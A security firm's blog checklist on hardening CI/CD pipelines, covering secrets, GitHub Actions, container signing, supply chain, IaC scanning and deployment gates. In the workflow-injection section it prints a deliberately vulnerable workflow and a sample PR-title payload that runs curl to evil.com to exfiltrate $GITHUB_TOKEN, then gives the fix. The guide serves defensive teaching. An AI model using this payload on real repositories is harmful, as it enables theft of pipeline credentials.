
Securing Your CI/CD Pipeline: The DevSecOps Checklist for Engineering Teams

Lorikeet Security Team February 21, 2026 10 min read

Your CI/CD pipeline is probably the most privileged system in your entire infrastructure. It has access to production credentials, deployment keys, cloud provider tokens, container registries, and the ability to push code directly to your customers. It runs with more access than any individual developer on your team. And in most organizations, it is one of the least secured components in the stack.

Attackers know this. The SolarWinds breach started with a compromised build pipeline. The Codecov incident exposed secrets from thousands of CI environments. The ua-parser-js and event-stream supply chain attacks weaponized the automated trust that pipelines place in upstream dependencies. These were not hypothetical scenarios or CTF challenges. They were production incidents that affected millions of users.

The problem is not that engineering teams are negligent. It is that CI/CD security falls into a gap between responsibilities. Developers own the pipeline configuration but think of it as a build tool, not a security boundary. Security teams audit the application code but rarely look at the .github/workflows/ directory or the Terraform modules that provision the pipeline infrastructure. The result is a high-value target that nobody is actively defending.

This article is the checklist we wish every engineering team had before their first production deployment. It covers the full attack surface of a modern CI/CD pipeline, from secret management to supply chain integrity, with specific, actionable guidance you can implement this week.


Why CI/CD pipelines are high-value targets

To understand why pipeline security matters, you need to think about what your CI/CD system actually has access to. In a typical setup, the pipeline can:

  • Read production credentials, deployment keys, and cloud provider tokens
  • Push images to container registries and deploy code directly to customer-facing environments
  • Act with service accounts whose combined access exceeds that of any individual developer

A compromised pipeline is not just a build system issue. It is a direct path to production, to customer data, and to every secret your application depends on. An attacker who gains control of your CI/CD pipeline effectively has the combined access of every service account, deployment key, and production credential that the pipeline uses.

The asymmetry is the problem. A developer laptop compromise gives an attacker access to whatever that developer can reach. A pipeline compromise gives the attacker access to everything the pipeline can reach, which in most organizations is everything in production. This is why pipeline security is not a "nice to have": it is the single highest-leverage security investment most engineering teams can make.


Common CI/CD security failures

Before we get to the checklist, let us catalog the most common ways pipelines get compromised. These are not theoretical attacks. Every one of these patterns has been exploited in real-world incidents affecting real companies.

Secrets exposed in logs

  • Build logs contain environment variables, command outputs, or debug information that includes credentials
  • Secret masking is not enabled or does not cover all secret formats
  • Error messages from failed API calls include authentication headers or tokens in plaintext
  • Build artifacts or test reports are stored with embedded credentials
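One layer of defense in depth, alongside your CI platform's built-in secret masking, is scrubbing known credential formats from build output before it is stored. A minimal illustrative sketch (the sed pattern only catches one token format, GitHub personal access tokens, and is no substitute for platform-level masking):

```shell
# Illustrative log scrubber: redact GitHub-style tokens (ghp_ + 36 chars)
# before build output leaves the runner. The sample token below is fake.
printf 'Deploying with token=ghp_ABCDEF1234567890ABCDEF1234567890ABCD\n' \
  | sed -E 's/ghp_[A-Za-z0-9]{36}/ghp_[REDACTED]/g'
# prints: Deploying with token=ghp_[REDACTED]
```

In practice you would pipe the whole build step's output through a filter like this, with one pattern per credential format you use.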

Overprivileged service accounts

  • Pipeline service accounts have full admin access to cloud providers instead of scoped IAM roles
  • A single set of credentials is shared across all pipeline stages (build, test, deploy to staging, deploy to production)
  • Service accounts are never rotated and have no expiration policy
  • The same token that runs unit tests can also push to production
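One way to eliminate long-lived, shared cloud credentials entirely is OIDC federation: each job requests a short-lived token scoped to a single role, so there is nothing static to leak or rotate. A minimal sketch for GitHub Actions and AWS, using the aws-actions/configure-aws-credentials action with an illustrative role ARN (pin the action to a commit SHA in practice):

```yaml
# Sketch: the staging deploy job assumes a narrowly scoped IAM role via
# OIDC federation. No long-lived cloud keys are stored in CI.
deploy-staging:
  runs-on: ubuntu-latest
  permissions:
    id-token: write   # required to request the OIDC token
    contents: read
  steps:
    - uses: aws-actions/configure-aws-credentials@v4
      with:
        role-to-assume: arn:aws:iam::123456789012:role/ci-deploy-staging
        aws-region: us-east-1
```

A separate role per environment (staging vs. production) gives you the per-stage credential separation described above for free.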

Unsigned and unverified artifacts

  • Container images are built and deployed without content trust or signature verification
  • No chain of custody exists between what was built and what was deployed
  • An attacker who compromises the artifact registry can replace a legitimate image with a malicious one
  • Build provenance is not recorded, making incident response nearly impossible

Dependency confusion

  • Internal package names are not reserved on public registries, allowing an attacker to publish a malicious package with the same name
  • Package managers resolve public packages before private ones by default
  • Lockfiles are not committed or are not enforced during CI builds
  • No integrity checks (checksums or signatures) are performed on downloaded dependencies
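The integrity-check gap in particular is cheap to close: commit a checksum alongside any artifact your build downloads, and verify it before use. An illustrative sketch with made-up file names (the checksum file would normally be committed to the repository ahead of time, not generated in the same run):

```shell
# Illustrative integrity check for a downloaded or vendored artifact.
cd "$(mktemp -d)"
printf 'fake dependency contents\n' > dep.tar.gz   # stands in for the download
sha256sum dep.tar.gz > dep.tar.gz.sha256           # in practice, committed in advance
sha256sum -c dep.tar.gz.sha256                     # non-zero exit fails the build
# prints: dep.tar.gz: OK
```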

If any of these sound familiar, you are not alone. In our experience conducting secure code reviews, at least three of these four patterns are present in the majority of CI/CD configurations we examine. The good news is that every one of them is fixable with the right configuration and practices.


GitHub Actions security

GitHub Actions is the most widely used CI/CD platform for modern software teams, and it has its own unique attack surface that deserves dedicated attention. The convenience features that make Actions easy to use are often the same features that create security vulnerabilities.

Workflow injection attacks

The most dangerous class of GitHub Actions vulnerabilities is workflow injection. This occurs when untrusted data from a pull request, issue, or comment is interpolated directly into a workflow using the ${{ }} expression syntax.

# VULNERABLE: Attacker-controlled PR title is injected into a shell command
- name: Print PR title
  run: echo "PR: ${{ github.event.pull_request.title }}"

# An attacker can set their PR title to:
# "; curl https://evil.com/steal?token=$GITHUB_TOKEN #
# which breaks out of the echo and exfiltrates the token

The fix is to never interpolate untrusted expressions directly into run: blocks. Instead, pass them through environment variables, which are not subject to shell injection:

# SAFE: PR title is passed as an environment variable
- name: Print PR title
  run: echo "PR: $PR_TITLE"
  env:
    PR_TITLE: ${{ github.event.pull_request.title }}

This applies to any GitHub context value that can be influenced by an external contributor: github.event.pull_request.title, github.event.pull_request.body, github.event.issue.title, github.event.comment.body, github.head_ref, and branch names in general.

GITHUB_TOKEN permissions

By default, the GITHUB_TOKEN in a workflow has broad read/write permissions across the repository. This is far more access than most workflows need. Restrict it at the workflow level:

permissions:
  contents: read
  pull-requests: write
  # Only grant the specific permissions this workflow needs
  # Never use permissions: write-all

You should also enable the organization-level setting that restricts the default GITHUB_TOKEN to read-only. This forces every workflow to explicitly declare the permissions it needs, following the principle of least privilege.

Third-party action risks

Every uses: directive in a GitHub Actions workflow is a trust decision. When you reference actions/checkout@v4, you are running code from a third-party repository inside your pipeline with full access to your repository secrets and GITHUB_TOKEN. Common mistakes include:

  • Referencing actions by mutable tags or branches, which the maintainer (or an attacker who compromises the maintainer's account) can repoint to malicious code
  • Pulling in unmaintained or unreviewed actions without auditing what they do with the secrets and token they receive
  • Assuming an action's popularity implies safety; widely used actions are exactly the ones worth compromising

The mitigation is to pin every action to a specific commit SHA, not a tag or branch:

# VULNERABLE: Mutable tag can be changed by the action maintainer
uses: actions/checkout@v4

# SAFE: Pinned to immutable commit SHA
uses: actions/checkout@b4ffde65f46336ab88eb53be808477a3936bae11 # v4.1.1

Tools like Dependabot and Renovate can automatically create pull requests to update these SHA pins when new versions are released, so you get both security and convenience.
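Auditing existing workflows for unpinned actions takes one line of shell. A hypothetical audit helper, shown here against an inlined sample workflow (in CI you would point it at .github/workflows/):

```shell
# Hypothetical audit: flag `uses:` references that are not pinned to a
# full 40-character commit SHA.
cat <<'EOF' > /tmp/sample-workflow.yml
steps:
  - uses: actions/checkout@v4
  - uses: actions/checkout@b4ffde65f46336ab88eb53be808477a3936bae11
EOF
grep -hoE 'uses:[[:space:]]*[^[:space:]]+' /tmp/sample-workflow.yml \
  | grep -vE '@[0-9a-f]{40}$'
# prints: uses: actions/checkout@v4
```

Run it as a CI check itself and fail the build when it produces any output.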


Secret management in pipelines

Secrets are the crown jewels of your CI/CD pipeline, and they are frequently mismanaged. The goal is simple: secrets should be available to the pipeline stages that need them, invisible to everything else, and rotated frequently enough that a compromised secret has a limited blast radius.

What not to do

Vault integration

The gold standard for pipeline secret management is a dedicated secrets vault (HashiCorp Vault, AWS Secrets Manager, Google Secret Manager, or Azure Key Vault) with short-lived, dynamically generated credentials. Instead of storing a long-lived database password in your CI platform, the pipeline requests a temporary credential from the vault at the start of each run. That credential expires automatically, typically within minutes or hours.

This approach provides several advantages:

  • A leaked credential expires on its own, shrinking the blast radius from months to minutes
  • Every secret access is logged centrally, giving you an audit trail for incident response
  • Rotation happens automatically, with no manual process to forget under deadline pressure
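As a concrete sketch of what this looks like in a GitHub Actions workflow, the hashicorp/vault-action can fetch short-lived credentials at the start of a job. The Vault URL, role name, and secret paths below are illustrative:

```yaml
# Sketch: pull dynamic database credentials from Vault into the job.
# They expire automatically per the Vault role's TTL.
- uses: hashicorp/vault-action@v3
  with:
    url: https://vault.example.com
    method: jwt
    role: ci-deploy
    secrets: |
      database/creds/ci-role username | DB_USER ;
      database/creds/ci-role password | DB_PASS
```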

Secret rotation

Every secret used by your pipeline should have a defined rotation schedule. For most credentials, 90 days is the maximum acceptable lifetime. For high-value secrets (production database credentials, signing keys, cloud provider root tokens), 30 days or less is appropriate. Ideally, secrets should be ephemeral: generated at the start of a pipeline run and destroyed at the end.

Automate rotation wherever possible. Manual rotation is a policy that will be ignored under deadline pressure. Automated rotation through your vault or cloud provider's native rotation features ensures it actually happens.


Container image security in build pipelines

If your pipeline builds and deploys container images, the image build process is a critical security boundary. A compromised or misconfigured image build can introduce vulnerabilities that bypass every other security control in your stack.

Base image selection and maintenance

Start from minimal, officially maintained base images (distroless or slim variants) to shrink the attack surface, pin base images by digest rather than by mutable tags, and rebuild images on a regular schedule so that upstream security patches actually reach production rather than sitting in a registry you never pull from.

Image scanning in the pipeline

Integrate a container image scanner (Trivy, Grype, Snyk Container, or similar) into your pipeline that runs after the image build and before the image push. The scan should:

  • Fail the build on critical and high severity findings rather than merely reporting them
  • Cover both OS packages and application dependencies inside the image
  • Also run on a schedule against already-published images, since new CVEs are disclosed after release
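As one example, a Trivy invocation suitable for a pipeline step might look like the following (the image name is illustrative; the flags are Trivy's real options for failing the build on serious findings):

```shell
# Sketch: scan the freshly built image and return non-zero (failing the
# pipeline) if any critical or high severity vulnerabilities are found.
trivy image --exit-code 1 --severity CRITICAL,HIGH registry.example.com/app:latest
```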

Image signing and verification

Use Cosign (from the Sigstore project) or Docker Content Trust to sign every image your pipeline produces. Then configure your deployment targets (Kubernetes admission controllers, ECS task definitions, etc.) to reject unsigned or incorrectly signed images. This creates a chain of trust: only images built by your pipeline can be deployed to your infrastructure.

# Sign the image after building
cosign sign --key cosign.key $IMAGE_REGISTRY/$IMAGE_NAME:$TAG

# Verify the signature before deploying
cosign verify --key cosign.pub $IMAGE_REGISTRY/$IMAGE_NAME:$TAG

SAST, DAST, and SCA integration points

A mature DevSecOps pipeline integrates multiple categories of security testing at the right points in the development lifecycle. The key is knowing what each tool type does and where it belongs.

SAST
  What it tests: source code for known vulnerability patterns, insecure API usage, and taint flows.
  Where in the pipeline: on every pull request, before merge; block merge on critical findings.
  Limitations: high false positive rates; cannot detect logic flaws, business logic bypasses, or authorization issues.

SCA
  What it tests: dependencies for known CVEs, license violations, and end-of-life packages.
  Where in the pipeline: on every pull request, plus a scheduled nightly scan of the default branch.
  Limitations: only finds known vulnerabilities with assigned CVEs; zero-day and unreported vulnerabilities are invisible.

DAST
  What it tests: the running application for injection flaws, misconfigurations, and authentication issues from an external perspective.
  Where in the pipeline: after deployment to a staging or QA environment, against a full application stack.
  Limitations: slow; cannot test all code paths; requires a running application. Best used as a complement to SAST, not a replacement.

Secret Scanning
  What it tests: code, configuration, and commit history for accidentally committed credentials.
  Where in the pipeline: both a pre-commit hook on the developer machine and a post-commit CI check.
  Limitations: pattern-based detection; custom or non-standard secret formats may be missed, and historical secrets in git history need separate tools.

IaC Scanning
  What it tests: Terraform, CloudFormation, and Kubernetes manifests for misconfigurations.
  Where in the pipeline: on every pull request that modifies infrastructure code; block merge on high-severity findings.
  Limitations: cannot detect runtime drift; configuration may be correct in code but overridden manually in the cloud console.

The critical mistake teams make is running all these tools but not acting on the results. A SAST scanner that produces 500 findings that nobody triages is worse than having no scanner at all, because it creates a false sense of security. Start with one tool per category, tune it to eliminate false positives, and enforce a policy that findings must be triaged within a defined SLA. As we covered in our secure code review guide, automated scanning is a complement to manual review, not a replacement for it.


Supply chain security

Your application is not just the code your team writes. It is your code plus every dependency, transitive dependency, build tool, base image, and third-party integration that your pipeline pulls in. Supply chain attacks target these trust relationships, and they are becoming more common every year.

Verifying dependencies

  • Commit lockfiles and enforce them in CI (npm ci, pip install --require-hashes, or your ecosystem's equivalent)
  • Verify checksums or signatures on every downloaded dependency and build tool
  • Reserve your internal package names on public registries, and configure package managers to resolve your private registry first

SBOM generation

A Software Bill of Materials (SBOM) is an inventory of every component in your application, including versions, licenses, and provenance information. Generate an SBOM as part of your pipeline and store it alongside every release artifact. When the next Log4Shell-scale vulnerability drops, you will be able to determine within minutes whether your application is affected, instead of scrambling to audit every service manually.

Tools like Syft, Trivy, and CycloneDX can generate SBOMs in standard formats (SPDX, CycloneDX) directly from your container images or application manifests. Store them in a registry alongside the artifact they describe, and integrate them with your vulnerability management platform for continuous monitoring. For more on managing your software supply chain risks, see our dedicated guide.
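As one example of what this looks like as a pipeline step, Syft can emit an SPDX SBOM directly from a built image (the image and output names here are illustrative):

```shell
# Sketch: generate an SPDX-format SBOM for the release image and keep it
# next to the artifact it describes.
syft registry.example.com/app:latest -o spdx-json > app-sbom.spdx.json
```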


Infrastructure as Code scanning

If your pipeline deploys infrastructure changes through Terraform, CloudFormation, Pulumi, or Kubernetes manifests, those configuration files are part of your security surface. A misconfigured S3 bucket policy or an overprivileged IAM role defined in Terraform is just as dangerous as a SQL injection in your application code.

Common IaC misconfigurations

  • Publicly readable storage buckets and overly permissive bucket policies
  • IAM roles and policies with wildcard actions or resources
  • Security groups open to 0.0.0.0/0 on administrative ports
  • Databases and volumes created without encryption at rest
  • Kubernetes workloads running as root or without resource limits

Integrating IaC scanning

Tools like Checkov, tfsec, KICS, and Bridgecrew scan your infrastructure code for these misconfigurations before they reach your cloud environment. Integrate them into your pipeline so that:

  1. Every pull request that modifies *.tf, *.yaml (Kubernetes/CloudFormation), or other IaC files triggers a scan
  2. High and critical severity findings block the merge
  3. Medium and low findings are tracked as technical debt with a defined remediation timeline
  4. Custom policies enforce your organization-specific requirements (e.g., "all resources must have cost allocation tags" or "all databases must use customer-managed encryption keys")
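As a sketch of step 1, the pull request check can be as simple as running the scanner against the infrastructure directory and letting its exit code gate the merge (the directory name is illustrative):

```shell
# Sketch: scan Terraform/Kubernetes manifests in a PR check; Checkov
# returns non-zero on failed checks, which blocks the merge.
checkov -d infra/ --quiet
```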

The shift-left principle applies here just as it does to application security. Catching a misconfigured security group in a pull request is orders of magnitude cheaper than discovering it after an attacker has already used it to access your database.


Branch protection and code review enforcement

Your pipeline is only as secure as the process that governs what code enters it. Without proper branch protection, a single compromised developer account can push malicious code directly to the main branch and trigger a production deployment with no review.

Minimum branch protection rules

  • Require pull requests for all changes to protected branches, with no direct pushes, including by administrators
  • Require at least one approving review, and dismiss stale approvals when new commits are pushed
  • Require status checks (tests, security scans) to pass before merge
  • Require signed commits so that authorship can be verified

Pipeline configuration-as-code is still code. Your .github/workflows/, Jenkinsfile, .gitlab-ci.yml, and Dockerfile should be subject to the same review requirements as your application code. A change to the deployment pipeline is at least as impactful as a change to any application endpoint. Require code owner approval for all pipeline configuration changes.


Deployment security

The final stage of the pipeline, getting code from a build artifact to a production environment, is where many security controls are either enforced or bypassed. A secure deployment process ensures that only tested, reviewed, and authorized changes reach production.

Immutable artifacts

Once an artifact (container image, compiled binary, bundled application) passes your CI checks, it should be stored in an immutable artifact registry and deployed without modification. The exact artifact that was tested is the exact artifact that gets deployed. No rebuilding, no recompiling, no "quick patches" applied between staging and production.

This principle eliminates an entire class of attacks where the build output is modified between the test phase and the deployment phase. Tag your artifacts with the git commit SHA they were built from, sign them, and verify the signature at deployment time.
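A minimal sketch of commit-SHA tagging in a build step (registry and app names are illustrative):

```shell
# Sketch: tag the image with the exact commit it was built from, so any
# running artifact can be traced back to reviewed source.
IMAGE="registry.example.com/app:$(git rev-parse --short HEAD)"
docker build -t "$IMAGE" .
docker push "$IMAGE"
```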

Approval gates

Production deployments should require explicit approval from authorized team members. This is not about slowing down deployments. It is about ensuring that a compromised CI system or a rogue automation cannot push code to production without a human in the loop. Modern CI/CD platforms support environment-level approvals:

  • GitHub Actions: environments with required reviewers
  • GitLab: protected environments with approval rules
  • Other platforms: manual approval or hold steps before the production stage

The approval should include a review of what is actually being deployed: the commit range, the changelog, the test results, and the security scan outputs. An approval gate that rubber-stamps every deployment provides no value.
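In GitHub Actions, for example, the gate is expressed by pointing the deploy job at a protected environment; GitHub then enforces that environment's required-reviewer rule before the job runs (the deploy script below is illustrative):

```yaml
# Sketch: this job will not start until the "production" environment's
# required reviewers have approved the run.
deploy-production:
  runs-on: ubuntu-latest
  environment: production
  steps:
    - run: ./deploy.sh production   # illustrative deploy step
```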

Rollback capability

Secure deployments include the ability to quickly roll back to a known-good state. If a deployment introduces a security vulnerability (or if a compromised artifact makes it past your controls), the time to detect and revert is the primary factor in limiting blast radius. Ensure your deployment process supports:

  • Retaining previous artifact versions in the registry, so a rollback never requires a rebuild
  • A single-command (or single-click) revert to the last known-good release
  • Automated rollback triggers tied to health checks or canary analysis
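On Kubernetes, for instance, the single-command revert already exists (the deployment name is illustrative):

```shell
# Sketch: revert a Deployment to its previous ReplicaSet...
kubectl rollout undo deployment/app
# ...or pin a specific known-good revision explicitly.
kubectl rollout undo deployment/app --to-revision=12
```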


Monitoring and alerting for pipeline anomalies

Prevention is essential, but detection is the safety net. Even with every control in this checklist implemented, you need visibility into anomalous pipeline behavior that could indicate a compromise in progress.

What to monitor

  • Changes to workflow and pipeline configuration files, especially from new or external contributors
  • Secret access patterns: a job reading secrets it has never used before is a red flag
  • Pipeline runs at unusual times, from unusual branches, or triggered by unfamiliar accounts
  • Unexpected outbound network connections from build runners, a common sign of exfiltration

Centralized pipeline logging

Send all pipeline logs to a centralized, append-only logging system that is separate from the pipeline itself. If an attacker compromises your CI system, they should not be able to delete or modify the logs that would reveal the compromise. Use a SIEM or log aggregation platform (Datadog, Splunk, Elastic, or even a dedicated S3 bucket with object lock) to store and analyze pipeline audit data.


The DevSecOps maturity roadmap

Implementing everything in this article at once is not realistic for most teams. Security is a journey, not a destination. Here is a practical maturity roadmap that prioritizes the highest-impact controls first and builds toward a comprehensive DevSecOps practice over time.

1 Foundation (Week 1-2)

Enable branch protection rules on your default branch. Require pull requests, at least one review, and passing status checks. Move all secrets from pipeline configuration files to your CI platform's secret storage. Enable secret masking in build logs. Pin third-party actions to commit SHAs.

2 Automated Scanning (Week 3-4)

Add SCA scanning (Dependabot, Snyk, or Renovate) to flag known vulnerabilities in dependencies. Add a secret scanner (GitLeaks, TruffleHog) as a pre-commit hook and CI check. Commit and enforce lockfiles. Configure your package manager to use --frozen-lockfile or npm ci in CI.

3 Pipeline Hardening (Month 2)

Restrict GITHUB_TOKEN permissions to the minimum required per workflow. Implement least-privilege service accounts with separate credentials per environment. Add container image scanning if you deploy containers. Set up IaC scanning for infrastructure code. Require signed commits from all contributors.

4 Advanced Controls (Month 3)

Integrate a secrets vault for dynamic, short-lived credentials. Implement image signing and verification with Cosign. Add SAST scanning to pull request checks. Set up deployment approval gates for production environments. Generate and store SBOMs with every release.

5 Continuous Improvement (Ongoing)

Add DAST scanning against staging environments. Implement canary deployments with automated rollback. Set up centralized pipeline logging and anomaly detection. Conduct regular pipeline security audits. Establish a secret rotation schedule and automate it. Run tabletop exercises simulating pipeline compromise scenarios.

Each stage builds on the previous one. Do not skip ahead to image signing before you have branch protection and secret management in place. The foundations matter more than the advanced controls, because they address the most common and most easily exploited attack vectors.


Putting it into practice

CI/CD pipeline security is not a separate discipline from application security. It is the foundation that everything else builds on. The most thoroughly reviewed application code in the world is meaningless if an attacker can modify it during the build process, inject malicious dependencies, steal deployment credentials, or push a compromised artifact directly to production.

Start with the foundation: branch protection, secret management, and dependency integrity. Then layer on automated scanning, image security, and deployment controls. Finally, add monitoring and detection to catch what prevention misses. The roadmap above gives you a realistic timeline, but the most important step is the first one.

If you are not sure where your pipeline stands, a security code review that includes pipeline configuration analysis will identify the gaps and give you a prioritized remediation plan. The vulnerabilities in your CI/CD system are not hypothetical risks. They are the attack vectors that sophisticated adversaries are actively exploiting, and the window between "we should fix that" and "we just got breached" is shorter than most teams realize.

Need help securing your pipeline and codebase?

Our security engineers review your CI/CD configuration, pipeline code, and deployment architecture alongside your application source code. We identify the vulnerabilities that automated tools miss and deliver a prioritized remediation plan your team can act on immediately.

Lorikeet Security Team

Penetration Testing & Cybersecurity Consulting

We've completed 170+ security engagements across web apps, APIs, cloud infrastructure, and AI-generated codebases. Everything we publish here comes from patterns we see in real client work.
